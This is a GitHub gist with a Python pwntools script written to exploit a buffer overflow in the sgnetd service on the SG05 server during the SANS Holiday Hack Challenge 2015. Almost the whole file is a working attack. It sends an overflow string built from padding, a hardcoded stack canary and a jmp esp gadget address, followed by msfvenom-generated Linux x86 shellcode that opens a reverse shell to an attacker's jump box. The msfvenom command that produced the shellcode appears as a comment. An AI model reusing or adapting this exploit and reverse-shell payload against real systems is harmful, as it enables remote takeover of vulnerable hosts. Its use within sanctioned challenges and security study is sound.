Last active
January 8, 2016 09:11
-
-
Save ahhh/c1a281f676c6a1892f95 to your computer and use it in GitHub Desktop.
Script used to exploit SG05, a sever vulnerable a buffer overflow in sgnetd during the SANS' Holiday Hack Challenge 2015,
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #/bin/python | |
| # Uses pwntools: https://github.com/Gallopsled/pwntools | |
| from pwn import * | |
| #TARGET_SERVER = "127.0.0.1" | |
| TARGET_SERVER = "54.233.105.81" | |
| TARGET_PORT = 4242 | |
| conn = remote(TARGET_SERVER, TARGET_PORT) | |
| # Jump box is at 192.241.XXX.XXX | |
| # msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp2 LHOST=192.241.XXX.XXX LPORT=4444 -f python | |
| buf = "" | |
| buf += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66" | |
| buf += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0" | |
| buf += "\xf1\xdb\xbf\x68\x02\x00\x11\x5c\x89\xe1\xb0\x66\x50" | |
| buf += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73" | |
| buf += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0" | |
| buf += "\x0b\xcd\x80" | |
| # Important values: | |
| # Hardcoded canary | |
| CANARY = 0xe4ffffe4 | |
| # Our jmp esp ROP gaget | |
| NEW_EIP = 0x0804936b | |
| OVERFLOW_STRING = "A" * 103 + pack(CANARY)+ "B"*4 + pack(NEW_EIP) + "C"*6 + buf | |
| def main(): | |
| print "Starting tcp client..." | |
| print conn.recvuntil("3") | |
| print conn.sendline("X") | |
| print conn.recvuntil("protected!") | |
| conn.sendline(OVERFLOW_STRING) | |
| #conn.interactive() | |
| if __name__ == '__main__': | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment